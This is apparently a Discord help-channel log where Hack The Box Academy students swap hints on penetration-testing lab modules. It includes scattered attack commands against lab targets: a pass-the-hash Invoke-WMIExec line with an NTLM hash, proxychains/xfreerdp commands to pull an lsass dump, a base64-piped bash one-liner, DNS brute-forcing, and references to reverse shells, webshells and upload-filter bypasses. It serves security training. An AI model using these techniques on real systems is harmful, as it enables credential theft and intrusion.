whoever was using vmware to do hackthebox you get a W

I'm just thinking it might be this way, hoping anyone can correct me if I'm wrong
Return traffic is, it just sends the traffic back to where it came from, in this case (1) 172.16.5.19:8443 -> (2) 172.16.5.129:ARBPORT -> (3) (Internal Bind mapping for 172.16.5.129:ARBPORT and 172.16.5.129:8080) -> (4) 10.10.15.5:ARBPORT

You could get a traceroute and that’ll tell you.

The 3rd step is where the magic happens, and the ubuntu machine knowing to forward it to our machine, once it receives the packets from the windows host.

Usually hosts don’t forward packets and it’ll get forwarded to a router or switch. In this instance, it’s being forwarded to a separate subnet. So there’s definitely a router hop here. Forwarding is done using longest orefix match

I believe trace-route would just stop at the first packet in this case?

In the medium Lab?
Check out all the services.
I still don't know which list you mean, but I suspect you are trying a brute force approach. If yes, this is the wrong way

Has anyone here managed to get past the Exploiting Web Vulnerabilities in Thick-Client Applications yet? I'm running into an issue. I get to the point where I've created the fatty-client-new.jar and when I double click on it to open it, nothing happens. I went back and made sure I removed the hashes from the MANIFEST.MF file and altered the port number to 1337 in the beans.xml file as specified. Any idea why the fatty-client-new.jar isn't working?

I feel like I get your point, yeah

No? Why do you think that? And why are using “stop at the first packet”? The way traceroute works it sends a packet and forces an ICMP message back to the sender

You done that section?

traceroute measures the route based on TTL counts right? so I can only traceroute to the ubuntu host, not to the windows host. so my traceroute will only fetch the hops from my machine to the ubuntu machine and not any further right?

We are talking about running traceroute from the attacker machine yes?

how is it wrong

There is no trace route command in the victim machine, and you cannot run trace route in your own machine to connect windows server

Yes, traceroute works by exploiting TTL by eliciting a time exceeded. The message that gets sent back is an ICMP message.

I was speaking generally on how to view the the route a packet takes.

You don't need to force anything in this lab

I doubt that we could get any meaningful information from using traceroute in this case we have.

I didn’t mention connecting to the windows server using traceroute? I was just talking about how to view the route a packet takes

was that a tip?

Probably. But you were speculating the path a packet takes and I was thinking “Why speculate when you could get the actual information”

Take a close look at all services
Not all need a password

Hi all, in the module password attacks, PtT from Linux, can someone give me a hint on how to find svc_workstions keytab file. (I have a keytab file witouth the NTL hash) Or forge the tgt ticket? Im a bit lost :/

We could get the actual information*, only with network sniffing tools in this case tho, as we're working with TCP which involves source and destination IP:ports, not with traceroute which just works with ICMP and ICMP has nothing to do with speculating port and it's traffic

I believe tcpdump on the ubuntu host with filters would be right choice for knowing this.

@rapid sparrow the ubuntu host got tcpdump?

I don't have that permssion

Ah right,

sorry rechecked, I could run it

with sudo

Ah, you got root privs on it?

Nice

yes

pm?

In terms of understanding the network, it has its uses. And what you’re describing is called the 5-tuple which identifies the session. And while looking at ports is useful for identifying processes. But I imagine the layer 4 traffic is more useful for identifying the process 🤣

https://academy.hackthebox.com/module/136/section/1290 Upload Attacks - Type filters

any hint?

i arrived here

What questions you can't answer?

you've successfully passed the white-list filters, now time to crush those black-list filters

can someone tell me what service is it !!
https://academy.hackthebox.com/module/112/section/1079

its so frustrating and i tried them all

htb is weird sometimes , feels like some guy made this lab while being sick

the only one there is

Check out all the services. What or which services were discussed in the module?

No one was sick when they wrote this module. Just because you may not have understood everything doesn't mean the author did anything wrong.

nobody knows

🙂

everybody who did the module know it

oh that photo

lets all put a like on that

is passing the blacklist as well

i have been 1 hour trying to fix this

why's your payloading sitting in an image src?

the file uploads is there

this is my burp request

i got it

Ah, nvm for my question.

How'd you get it?

long

||making a list for the whitelist, blacklist, magic bye and the content-type accepted||

||and just taking the double extension that let me run commands in the backend and the one which the page will think it is an image||

Hi! Can anyone help me with the very last stage of Getting Started? Knowledge Check. https://academy.hackthebox.com/module/77/section/859 I found the exploit in the theme changer and got a shell, but can't find the user.txt. I think I might have blown past it because I found I have root access to PHP and root is a command away.

Got it, LOL.

@fossil crescent Hey, can I DM you regarding this? I've bypassed the WAF but not getting the email.

Sure np

Sent you a friend request for DM.

HTML Injection--> Module 'Introduction to web applications', What text would be displayed on the page if we use the following payload as our input: <a href="http://www.hackthebox.com">Click Me</a>

Answer --> Your name is Click Me

ayyeee same @pine dagger from FN discord. Small community

Woo! HTTP Attacks all done. Was soooo close to the answer, just needed a little hint.

Having issues with the getting started knowledge check

Can't upload my php reverse shell

the upload button is not working on the admin page

Anyone here able to lend some assistance with the LDAP section in Attacking Common Applications?

I've tried everything I can think of and I seem to bypass the login.

Never mind. I figured it out.

I’m stuck in the attacking common services hard lab. I got rdp creds for F, along with the other .txt files, know I can impersonate as J, found a linked server L, but I have no idea how to interact with it😅

u impersonated already?

Yes, I’m impersonated as J

and have u done after that

I found the linked server L

But I’m not sure how to interact with it

I also found a table called tb_users but I can’t seem to open it

Communicate with Other Databases with MSSQL

there is a part called like that

in the sql section

I know

But like I said, I can’t figure it out

@zinc marsh do you mind if I dm you so I can speak more freely?

did u activate the cmd

in the sql?

as u want but u just have to read the sql section

Sent you a dm

academy HackTheBox isnt letting me unlock modules even tho i have enough cubes. Any idea why?

u sure?

Yeah i have 70 cubes and the module is 10. Im just doing the "Free" stuff

I press unlock and nothing happens or pops up

there arent modules for 10 cubes lol

? there's one called Learning Process and it says Unlock for 10 cubes?

ah the fundamentals

Yeah

i thought they were free

i dont remember

It says its 10 cubes but gives you 10 cubes back so technically free

if u click on unlock u cannot unlock them?

No, all it does is slightly move everything to the left and when i click it again it moves back to the right

close it and open it again maybe?

Nothing, i even logged out and logged back in and still the same

idk contact support

that is weird u are the first person i see with that issue

https://academy.hackthebox.com/achievement/664482/136 Finally, the skill assessment was crazy

Hey does anyone know how the modules work post subscription? Like if I buy cubes but let me monthly subscription out I keep the courses I unlocked? But if I pay for a yearly subscription rather than cubes and have unlimited access below tier 2... Once that subscription is up I lose access to everything?

Contact support here or on the site?

u have access to the modules u completed

site

cool cool. Thank you

Alright thanks!

It's more worth it to just pay for platinum or student tbh.

No time limit to finish the modules + you can buy whatever module u want.

I've spent more money on dumber things 🫠

hi so i was doing this module https://academy.hackthebox.com/module/54/section/483
and im kinda stuck now

we are supposed to recurse the directories of the target machine and look for the flag but there are only 2 directories of the target machine and they both have files which dont have the required flag

help ._.

Capitalism.exe

hey everyone, I'm currently on the ACL Enumeration part of the ACTIVE DIRECTORY ENUMERATION & ATTACKS Modules. I'm stuck at the last question What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word). I managed to find the answer via bloodhound but I can't get the correct answer format to submit 😭

oh my days! It turns out that AceType has a different name which doesn't even mentioned in the Access Control List (ACL) Abuse Primer 😭 . Hope they fix this or at least update the question

Anyone done with the Intro to Windows Command Line?

I am stuck on user4 for hours

I have tried everything but I can't get the flag.

You should take a look at the logrotate configuration files. I'm still trying to get this exploit to work though.

How should I brute force with Fiona user at attacking services easy lab?

If you're referring to|| the compress option set||, I did adjust the command accordingly. Others where having issues as well, not sure if anyone has solved it yet.. I think it's bugged lol

With a nine headed water serpent

Lol wyn

Wym

It's a hint to the tool you should use

Lol yes hydra

I using hydra with rock you

And put full name

I tried with provided password list too

Neither works

Dm me your command if you want

I just solved it... it's painful. ||pspy can be helpful||

Done

pspy just confirms that it's being rotated by the root user, that's all I saw when I used it. Did it show something else that was helpful besides that?

It shows|| the time period and that it's not a configuration file you can view... so look for what might be rotated...||

Hi

I did find which log is being rotated ||the one in the home directory and time is 5 seconds|| and I had logrotten win the race conditions but my payload didn't execute. i.e I didn't see my payload sit in the ||bash_completion.d|| directory

So far that sounds good. ||It won't execute immediately. Consider what might cause it to execute.||

Yeah, by winning the race condition I meant, ||modifying the file to get it log the file which inturns executes the exploit||

If that's what you are referring to?

the exploit ||adds a file to a /etc/... configuration directory -- just adding the file doesn't cause it to execute immediately||

can anyone help

Uh huh, I was expecting it to execute automatically from the way I've seen it being exploited. I'll look into it.

Thanks for the insight

hint fuzz one of those 2 directory

hint try some of the stuff under Find & Filter Content in the cheat sheet of that module

Yeah I managed to find the solution a while ago. Used Where-Object to find it

Hi

Ok I think i cant ask it

How can i nuke my own server

Its only me in there

if you are new here read #welcome and #rules

this isn't the place for that

Ok

done PM me for hints

Anyone pls help?

Have you tried bruteforcing with a mutated password list?

Yes I did

tried crackmapexec, when i did that assessment i wasnt able to get the password with hydra, but i was able to get it using crackmapexec

also in my case, crackmapexec seems to run faster from the pwnbox than from my kali vm

hiii , i'm a newbie , just joined today ! happy to meet you all 🙂

have you got it?

I find the conf file and access.log file, and try to get the reverse shell back, and IDK how long it takes

Hi In pass attack- credentials hunting in linux Im mutation Loveyou1 password with custom rule and brute force using hydra in ssh but I don’t have any credentials to Kira !

This isn't the place for idle chatter, read #rules and #welcome

Try a different service that's running. Also are you using the custom.rule from the resources?

Ya from res .. I’ll try another

Hi, I am practicing the RDP session hijacking explained here and can't make it work https://academy.hackthebox.com/module/116/section/1171 .
Weirdly, every time I use tscon to do session hijack, I am asked to provide password. (I am, of course running this from SYSTEM privs)
I have also tried the "graphical way" using directly taskmgr as SYSTEM and it doesn't works...
Any idea of what could be wrongly done ?

Finally done with the updated one

what does oen mean ?

one*

do you mean that each time a module gets modified, you can "pass" it again ?

correct, re-pass it

ok, didn't knew that. so, does that also means that we must check for any module update before being able to finish the job role path ?

2 services working on the target ssh ftp using hydra after mutation pass tell me ||!!!!!!!|| but when log in I can’t because this is not correct password

yes you are right, and if you schedule the exam using your annual leave, and when the module updated, you might need to re-schedule

Remove the password from your message. Also are you copy/pasting the password in the password prompt?

the password is correct

but perhaps you may need to auth other ways than ssh

Sometimes if you message support they'll give you a pass for it and allow you to take the exam* depending when the content was updated

Removed .. ya just copy paste

Are you getting a (public key) error?

Anyone has played with RDP session HJ ?

No now It’s work just restart my machine thanks 🌹

Hello All
Could you please help me with Easy lab from Attacking Common Services?
I got the username fiona
and also files from ftp
Now I don't know what to do with 50652.txt

idk what should I add in "PoC."

What is 50652.txt file? Where did you get it?

I got the Web info txt file from ftp and there was info about CoreFTP

There's a couple different ways to exploit

I'm not sure what to do now

I know that this website used Apache and I know the direcotry

I know that there is CoreFTP

i fuzzed them MULTIPLE times. blog has just a home.php page while forum has no valid page in it.

Have a look at the other txt file

ok FTP using HTTPS

ftp got only 2 files as I know

Yes, you know the exact paths with it. They are important.

pls help

With what exactly?

In which way should I go now

idk what can I do with this info

with this ftp files

You now have the exact paths. What could happen if you could save a file in one of the paths?

webshell

?

Development Frameworks & APIs --> Module 'Introduction to web applications' --->Use GET request '/index.php?id=0' to search for the name of the user with id number 1? answer == Target + index.php?id=1 in the browser.

try it

What exactly is the question?

How do I Terminate this so it stops using up my time?

Academy targets don't use any time up.

but which shell?

The only thing that's limited (unless you buy cubes) is the in-browser vm (pwnbox)

from 59 to 56 minutes

That life left is the timer until the target itself dies

thank you @fathom pendant

You can respawn the target an infinite amount of times

If you're using a personal vm with VPN there is no time limit

Think about how you could save files.

using PUT

stuck with this

https://academy.hackthebox.com/module/158/section/1434

Comment out the socks5 7777 line

Literally read the error, it tells you what went wrong

it works now, thanks

Folks .. I’m in Kira now when search about information I found ||login.json|| I need to decrypt user and pass but I cant using Firefox_decrypt tool or LaZagne

Hi I have an issue in "RDP and SOCKS Tunneling with SocksOverRDP" module.

Real-time protection sucks ;)

The .dll file extension will delete I do not know why I can't run regsvr32.exe SocksOverRDP-Plugin.dll.

#modules message

Sorry, what is this?

Hi. Is anyone done with Linux PrivEsc Environment Enumeration section? I've been looking for the flag for two days still can't find it

A Link to this Message from Marcie

Just because defender is turned off, doesn't mean there isn't any protection running

I am stuck on the same

I tried proceed to the next section to find the latest Python version. Found out the latest python version is 3.11, but doesn't work as well.

Thanks.

Hi

hey guys, are there plans to have VPNs available for asia region?

2 Tools doesn’t work on my kali or on pwnbox any hint or idea ?

someone mind helping me with Pivoting, tunneling and port forwarding skills assessment? I'm stuck at this question:
For your next hop enumerate the networks and then utilize a common remote access solution to pivot. Submit the C:\Flag.txt located on the workstation.

I know what to do, but need a hint about how.

Try revshell payloads for a reverse shell

https://www.revshells.com/

dm you

It's as it says, how do you enumerate a network?

It's just the file transfer that is not working

need the lsass.dmp file on my own machine

but can't get it

what is the current working directory that you are in?

what kind of file transfer techiniques did you use? since, there'a lot of pivots. You'd have to transfer files step by step from each pivot and finally to the host

Which is a hassle, or you'd have to setup a way for your hostmachine to directly reach the windows machine and it's just a copy past from here

C:/Temp? that's where you land when you execute the web shell?

do a pwd and can you tell me what it says?

From the first host to the one with the dump I tried:
scp
smb

The same from my host to the machine with the dump

In common webshells, your commands would always be executed in the same directory. You can read this #modules message if you want to understand why

To import modules and use them, you need to have a reverse shell, I believe you just can't do it from WebShells becuase every command you execute through webshells are packed in new sessions.

So pick up a simple payload from your favourite reverse shell site and get the reverse shell first

not sure what pivots are in place, but if your first host (assuming not the attacker machine and the actual first machine used to pivot is being referred to the first host here) can reach the machine with the dump, then you can create tunnels or port forwards to reach the dumps machine

Yeah, that's what I did. I'm currently with proxychains xfreerdp /v:... on the machine with the dump

Awesome, then you got two things you can do to dump it

copy paste or use xfreerdp /drive option to attach a drive and get the dumps

proxychains xfreerdp /v:172.16.5.35 /u:mlefay /d:inlanefreight.htb /drive:\PIVOT-SRV01\Users\mlefay\AppData\Local\Temp
or
proxychains xfreerdp /v:172.16.5.35 /u:mlefay /drive:SHARE,\PIVOT-SRV01\Users\mlefay\AppData\Local\Temp
or
proxychains xfreerdp /v:172.16.5.35 /u:mlefay /drive:SHARE,C:/Users/mlefay/AppData/Local/Temp

is not the right way I assume? It is giving me errors all the time

you're launching xfreerdp from your attacker machine right?

yea

You can only mount files from your attacker machine

not files from the remote machine

Thanks for reminding me that I'm dumb

https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/
This is what I found tho

Really? Hmmm, weird.

The terms might have confused you but, it's always the folder from your local machine where you'll be executing xfreerdp that you'll be mounting

/drive:SHARE,/tmp/
means inside the rdp you can access,
the files inside /tmp with \\TSCLIENT\SHARE\

Ah

keep hitting R and Enter

To import remote modules, you'd have to the script execution policy

normall, if you were doing this from a GUI, you'd have a prompt that says "Do you want to run? [Press R]" something like that

but in reverse shell cases, you won't see that prompt, except that prompt listening for you (which in this case, you think it's freezed)

yeah, that works but I'm really confused on how to get them now tbh

You could do Set-ExecutionPolicy -Policy Bypass -Scope Process but it'll still ask you I guess.

you can from two ways

GUI -> goto the mounted drive, you should see it in the This PC menu
Command line -> use the copy the command

That's what I did. But I'm feeling so dumb tbh

I'm prob doing the most stupid things

you got the dump inside the mount, that's all lol

you should now be able to see it in your machine where the mount root is

how many times did you press r and enter?

just once?

hhahahahaha funny

Okay, I was facing this problem once, I don't remember, maybe try A and enter

what my name

who farted in my name

also you're doing it like
r
r
r
and not rrrr right?

yes he is doing r r r r not holding r

read #welcome

also, captial R

not small r

?

if that's not it either, then it's something else.

❤️ ❤️

@amber marten I'm thinking for .ps1 it might be different. but for Importing .psd1 modules you'd have to hit R multiple times

Like this is note I made when I faced this

What is the FQDN of the host where the last octet ends with "x.x.x.203"?

can someone give hint on this "footprinting" module

dns enumeration

i ve been trying so long and cannot find anything please help me

same

dnsenum --dnsserver 10.129.138.136 --enum -p 0 -s 0 -o found_subdomains.txt -f /usr/share/seclists/Discovery/DNS/fierce-hostlist.txt inlanefreight.htb

Doing Using CrackMapExec : Skill Assessment and currently stuck on the foothold, I managed to brute rid and i don't know how to proceed

any help is well appreciated

ah, figured it out, had to think a bit more about what was happening 😁

You need to find all Zones

Why do you want to bruteforce the main zone?

im getting no response if i try bruteforcing the subdomains

dnsenum --dnsserver 10.129.138.136 --enum -p 0 -s 0 -o found_subdomains.txt -f /usr/share/seclists/Discovery/DNS/fierce-hostlist.txt mail1.inlanefreight.htb

same with app.inlanefrieght.htb

Hello everyone! I need help with the module "ATTACKING WEB APPLICATIONS WITH FFUF", section "Parameter Fuzzing - GET". I cannot seem to find the right parameter. I believe I found all directories and .php files. I tried fuzzing every one that I found but with no luck. Can anyone help me?

I solved logrotate - look at a few suggestions I added earlier

you finish the Linux priv esc module?

Hello, there are seniors on Windows PE.
Windows Privilege Escalation Skills Assessment - Part I
Q-2
What is the secret of finding the ldapadmin password with the privileges with which we log in?
Without an administrator, the password is NOT searched.
How should we have searched for it correctly starting with the second question, and not when we had already increased the privilege and did not launch - ||LaZagne.exe||

yes

As I said, you have to find all the zones.

Which of these subdomains could be managed as a separate zone?

File upload attacks got a crazy twist on the skills assessment lol

Use GET request '/index.php?id=0' to search for the name of the user with id number 1?

Why ID=0 when you are looking for the user ID=1?

It was a fun assessment lol

In the same question it indicates that you must use the id number 1 to obtain the user name.

and that does not work?

I deduced it from the question and as such it is obtained with the target + the GET request to obtain the user's name.

target/index.php?id=1

You get the answer

I try to do the questions without help to get a better understanding but there are others that I find difficult and I ask for help from all colleagues.

Hi ! I'm a little bit stuck in the password attack module : "What is the default password of every newly created Inlanefreight Domain user account?" can i have another hint pls i didn't find the script

don't

did you reed the pdf? i think is that question

☝️

which pdf ?

DM you

Linux Privilege Escalation

Logrotate

Did anyone get this to work?

On ATTACKING COMMON SERVICES > Attacking DNS (https://academy.hackthebox.com/module/116/section/1512) : when using subbrute I am always getting a warning message : Warning: No nameservers found, trying fallback list.
Does some of you know why I am getting this ?

I have tried on a test zone locally and don't get this warning. I am also able to communicate with the dns server referenced within resolvers.txt file using dig / host.

What is in the resolvers.txt?

it contains my target's ip

after enabling verbose mode and running Wireshark, I realize that this seems to be because the target DNS server doesn't accept ANY as query type... I may need to find another tool that will use all types of query perhaps

Are you sure that com and not htb or local is asked?

ouch !

spend about 2 hours, trying from both my kali and the pwnbox lol

Rip. Well at least you got it sorted ❤️

Damn

Im stuck on password attacks ,network attacks

WINRM 10.129.202.136 5985 WINSRV [-] WINSRV\user.list: "SpnegoError (16): Operation not supported or available, Context: Retrieving NTLM store without NTLM_USER_FILE set to a filepath"

I keep getting this when I run my Winrm command

and I downloaded the lists from the recourses button up top

what is the command you typed ?

are you sure the file user.list exists ?

it's username.list. damn thank you lol

whats the command to open a flag.txt file?

Windows or Linux?

linux

Should be able to use cat

I keep trying cat flag.txt

nothing

As in it gives you an error or it's empty. If it's the file not found error, are you sure you're in the right directory?

Evil-WinRM PS C:\Users\john\Documents> cat flag.txt
Evil-WinRM PS C:\Users\john\Documents>

Oj

OHHH

like this cant send an ss here

yeah

dude

You're on a windows machine

what am i missing

type flag.txt

no im on parrot terrminal

Evil-WinRM PS C:\Users\john\Documents> type flag.txt
Evil-WinRM PS C:\Users\john\Documents>

Brother

same thing

You are remoted to a windows machine

Also is the flag.txt in that directory?

yes I checked

yes i get what you mean now by windows. my bad

https://github.com/Hackplayers/evil-winrm try downloading the file

Also what module are you doing?

network services

in password artacks

Can't you just rdp in?

To verify that it's not blank?

yeah but im this far lol. might take a break and try that

Like I said though evil-winrm has a download feature you can use to download the file

¯_(ツ)_/¯

Can I PM someone about password attacks-hard? Will give away too much spoilers if I do it here

It's a lot of back and forth

Yeah, but I got stuck somewhere I didn't think I would get stuck... So just want to know if I'm just stupid or that there is really a problem

https://academy.hackthebox.com/achievement/361921/path/15

go for it

# bash<<<$(base64 -d<<<ZmluZCAvdXNyL3NoYXJlLyB8IGdyZXAgcm9vdCB8IGdyZXAgbXlzcWwgfCB0YWlsIC1uIDEK)

am i writing something wrong here?

66 modules done. 10 modules to go. 🙂

Is this a good order to learn things? Its all fundamentals or intro. (Top being 1 and going down from there)

Getting started should probably be first

I was thinking that as well but it says i should have a firm understanding of these other things to be able to complete it

But I'd say doing the infosec fundamentals path should be first

I mean i got all of these minus 2 from the infosec foundation path. I just dont have enough cubes to go through that whole thing

¯_(ツ)_/¯

yo guys

https://academy.hackthebox.com/module/112/section/1079

anyone familiar?

Has anyone run into issues using the gitlab_userenum.py tool? I had no problem using it earlier on the module, but I'm trying to use it now in the assessment and no matter how I try to run it, I either get an access denied error or it says the --wordlist that I'm pointing to doesn't exist.

Yeah, I got through this lab. What's your question?

@red current the sa credentials

depends on ur previous knowledge

how can i use it to login to the database?

https://chat.openai.com/

u have also https://www.google.com/

Absouletly none haha, ive read things before about some of the things in the list but not to an extent of fully understanding

https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

i just found that lol

Is anyone available to provide assistance with the Attacking Common Applications Skills Assessment II? I answered the first question and can't seem to get any further with anything I attempt to use.

Guys if I wanna start learning programming, do I need a laptop with high specifications or anything would work ?

• are Harvard courses can be considered as a good option to learn or gotta find another thing ?

You dont need high spec laptops to start learning programming

Its not like you're going to be coding programs with 100,000 lines of code to start with

I see thanks you!

What about this point?

There are so many free programming educational resources that the best option is whichever one works for you

If the Harvard one is free and you vibe with it, go for it

That's clear thank you but from your experience do you recommend something?

https://academy.hackthebox.com/module/109/section/1042 command injection - skills assessment

someone could give me a hint, I got run 'ls' command

I'm not the best to recommend a structured resource because that's not really how I learn, my learning is "I need to do X, how can I do X" and I google from there

Harvard sounds as good as any others, I mean, it's fricken Harvard

I did one from them

they are really good*

Hard or so so ?

https://pll.harvard.edu/course/cs50s-web-programming-python-and-javascript/2023-05

Depend on the person i guess

Makes sense

https://pll.harvard.edu/subject/programming

Do they give a certificate?

there are some free courses there

Yup I read about that

the one i did is not there because it was for the last year

yea

Pretty nice

https://pll.harvard.edu/course/cs50s-introduction-programming-python/2023-05

this one maybe is the easier

I think I have to join it

Thanks so much for your help

np

Hey guys, I'm working on Skill Assessment - Broken Authentication. I have ||a list of valid users||. I don't know how to ||brute force the login page and avoid rate limiting using the rockyou.txt file||. I'm also not sure if ||I used the right regex to limit the rockyou.txt wordlist||. Can anyone help?

Short module but funny 🙂
https://academy.hackthebox.com/achievement/664482/109

I can't anymore... Password attacks - hard. I found 3 passwords and none of them is working to unlock the vhd file

Its a simple password

It's time for a break

It's insane that I didn't try that before

hi.

im having trouble with the password attacks module

especially with the Pass the Ticket (PtT) from Linux questions

Check Carlos' crontab, and look for keytabs to which Carlos has access. Try to get the credentials of the user svc_workstations and use them to authenticate via SSH. Submit the flag.txt in svc_workstations' home directory.

i have found the flag but am unable to submit it

is there a bug here or somehting wrong?

i have tried converting it to base 64

downloading the file

everything

it might be a bug in the htb

Can anyone assist me with the following module? I cant get this answer

Module:  INFORMATION GATHERING - WEB EDITION
Page 7 Active Subdomain Enumeration
What is the FQDN of the IP address 10.10.34.136?

nslookup -query=PTR <IP> ns.inlanefreight.htb 
dig -x 10.10.34.136 @ns.inlanefreight.htb 

which question you at @gusty zinc

What is the FQDN of the IP address 10.10.34.136?

try zone swap

did that, no domain in the output matches the .136

if i remember theres a internal.

try zone transfer with that

add me on discord

ill try and help (i did the module)

Check for extra white-spaces, if that doesn't work DM me the flag and I can check it.

done

dont forget subdomains of subdomains

Hi, i am working on the module "ATTACKING COMMON SERVICES " part "Attacking FTP"

The target box keeps the port i need to attack close, i had just one box with the right port open all other boxes keeps the port close. Who can help me ?

reset the target until the port is opened

it could take a reset or two, but also make sure to give it 3-4 minutes to load

I did already 4 resets, and the box which is running now is already up for 32 minutes

It's a bit annoying, i just want to complete the path for the Academy

🤷‍♂️

No one here with knowledge of those boxes who can look into it ?

well, reset it until the port comes up

Hmm, too bad

we here are in most cases students like you.
Technical questions are best asked to the support (green bubble).

Just keep resetting, I had the same issue. Was pretty frustrating indeed

Yes it certainly is, especially since it is quite a simple module, and then it takes so much time

After 19 resets i finally found one box with the port open

https://academy.hackthebox.com/module/85/section/898

Debug the attached binary to find the flag being pushed to the stack

Anyone done this?

ayo

i need some help with this : Enumerate the Linux environment and look for interesting files that might contain sensitive data. Submit the flag as the answer.

can't find non

I would advise to read the man page for cURL

I got it, thanks!

But you need to find right user with his country code

And how to do it ? Check the task about enumeration users

Don’t forget to filter with website’s requirements from file rockyou.txt

Hey guys! I am currently in a CS class and I have to scrape a website and was wondering if anyone here know of any good, free Web Crawlers that I could use? The website that I'm gonna scrape might be relatively large, so something that could handle that would be nice. Any help on this would be greatly appreciated!

Good morning chat, i have an issue with the IMAP/POP3 section of foot printing. to be precise it is this question " What is the admin email address?"

i was able to get the email address after accessing the imap server and retrieving the flag. But my question is was there a way to get the "admin email address" without accessing the imap server

there was no hint to tell us it was on the imap server. I just guessed that was the mail and it worked

Hi, I'm trying to contact support regard some problem with billing, but I can't get "live person" via support chat. There is no option "Send us a message". Adblocker is disabled for thissite ofc...

As the module related to IMAP and you found the answer there, you found the intended route

hey guys , im in the database but idk where to look ... any hints ? https://academy.hackthebox.com/module/112/section/1079

??

katana from Project Discovery, or hakrawler

dm you

good afternoon friends, can i upload pics here?

So there was no other way for us to see the Admin email unless to open a mail ?
Again i just want to be sure if there wasn't something i was missing that would have shown the email add

The module was focused on that specific method. Email addresses can be discovered in other instances via other means such as Googling, enumeration of usernames (as email addresses are usually username@organization.org), looking at the domain's WHOIS information, etc. However, for this module, you completed the module in the intended manner.

If you verify your account you should be able to

At least I’m able to

In passwd,shadow&opasswod I need to crack unshadow.hashes using hashcat and rockyou.txt but It’s take a lot of time this is normal ?

Do you need to use rockyou or is there a password list provided in the resources?

No my rockyou file in kali

Use file in res maybe make it quick ?

I’ll try

Nothing change

What’s the module?

Password Attack- passwd.shadow&Opasswd

Use the mutated password list

Made from the pws.list provided + the custom.rule

Ya I’ll try also I made this list in previous questions

👍🏼

Thanks bro I’ve gotten answer

You’re welcome

you can ask on behalf of the ticket (user) you already have for another one

Verify it from my gmail you mean?

#welcome

try to check the kerberos tickets that are integrated into your session and use the full UNC path (FQDN)

thank you for your help 😊

You’re welcome 👍🏼

anyone done this lmao
https://academy.hackthebox.com/module/85/section/900
Try assembling and debugging the above code, and note how "call" and "ret" store and retrieve "rip" on the stack. What is the address at the top of the stack after entering "Exit"? (6-digit hex 0xaddress, without zeroes)

IK everyone almost focus on CPTS and CBBH path, but assembly is also fun

INTRO TO ASSEMBLY LANGUAGE - Procedures

I have a question about "impacket-smbserver", If anyone is able to help.

just ask and we'll see if we can help. Just want to add that it may be opportune to ask in "#general" if isn't correlated to an academy module

It has to do with (Password Attacks Lab - Hard)

When I set a share with User&Pass using (impacket-smbserver) and then try to transfer files. I get "access is denied".

INTRODUCTION TO NOSQL INJECTION - Skills Assessment 2

Can someone help me with finding the injection point? I've tried FFUF, nosqlmap, and Burp-NoSQLiScanner, but none of them can find the injection.

Look to the dot

omg lol, sadistic people behind this one. I suppose the rest of the module was fairly easy, so they needed to throw in a curveball

dm you

Module: Password Attacks
Section: Pass the Hash (https://academy.hackthebox.com/module/147/section/1638)

Was anyone able to use Invoke-TheHash for the last question?

Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt.

I can't find out why it isn't working. I copy-pasted the command line shown in the explanation part and I had no output:

Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "powershell -e <payload crafted>"

Anyway, I got the flag using chisel, then evil-winrm to the DC01.

read the options for secretsdump

need a hand for the skills assessment for pivoting and tunneling. I pivoted from the linux jump host to the first windows machine using proxychains xfreerdp and creds for mlefay. the question is asking about "which user is vulnerable". I saw the hint mentioning using "lsass". I have created a dump of lsass and am now stuck on how to get that file over to my attack host. do i take the dump file and move it to the linux jump host first? or do i get a meterpreter reverse shell to the windows machine, but how would that help? I'm lost.

well what errors did you get

I mean up to you. However youre most comfortable doing file transfer is your call

maybe im missing something. I'm not on the same network as the windows machine that has the dump file. so doing a typical file transfer method would never work, right?(i tried using smbserver and it did not work). So i was thinking of transferring the file from the internal windows machine to the linux jump host, but none of my tools are on the jumphost. I feel like im missing something easy.

hmm I dont believe that error should matter

sure if you want to you can do that

could also open up a new port forward for the file transfer

or get a meterpreter beacon running

or use a different tunnel method

this isnt a wrong answer situation, its a whatever works situation

is there a "best practice" answer?

no, its environment and opsec dependant

and the cpts doesnt cover opsec

so its whatever works for you

cool, thanks for the help

is .50 even the DC? idr

rough keep at it

does svc_sql have the right privs to dump the ntds?

@amber marten btw you should remove the spoiler password from your posts, its a lab assessment

from my searching that error shouldnt matter and can be ignored

try targetting a specific user, to see what kind of output you get

-just-dc-user administrator

👍

hi guys bro

[-] Cannot create "sessionresume_PlbBSNvK" resume session file: [Errno 13] Permission denied: 'sessionresume_PlbBSNvK'
I wonder what this error is, some kind of resume file like potfiles in hashcat?

tips or hints to as a start please ... already found the services: https://academy.hackthebox.com/module/112/section/1080

remember that there are several network protocols

https://academy.hackthebox.com/module/134/section/1178 Web Attacks -- HTTP Verb Tampering -- Bypassing Security Filters

I have tried all the HTTP Verbs, I had thought using command injection with verb tampering but not sure if it is the intended way

is the target machine windows?

i didtn check

a quick look at wapplyzer should tell you I guess

ubuntu linux

http://159.65.60.16:31443 [200 OK] Apache[2.4.41], Bootstrap[3.0.3], Country[UNITED STATES][US], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[159.65.60.16], JQuery[2.1.3], Script, Title[File Manager]```

The hint tell this See which HTTP method the injection filter is using, and try to use a different one.

There is one more, but I'm not sure if it'll work with linux as it's more of a iis implementation but,

||TRACK||

the verb is one of the common ones

I have tried ||post, head, options, put, patch, delete, connect, trace||

oh, then you haven't tried all the common ones

get is the default one

instagram accont panel

code

good, but you might be forgetting something crucial

finding the verb is part of the exercise, getting the flag is the other part

I thought i just had to use the file; cp /flag.txt ./

yes, but with the appropriate parameter verb

my faulyt

okey bro good night

make sense ty

how do i can deobfuscate the js code's ?

anyone can help with this error?
ssh tom@10.129.218.26
tom@10.129.218.26: Permission denied (publickey).

https://academy.hackthebox.com/module/112/section/1080

looks like you need a key

Is anybody able to assist me with the KERBEROS ATTACKS module?
It isn't a module specific question, I am more confused with how it wants me to connect to a machine.

Thanks!

which section

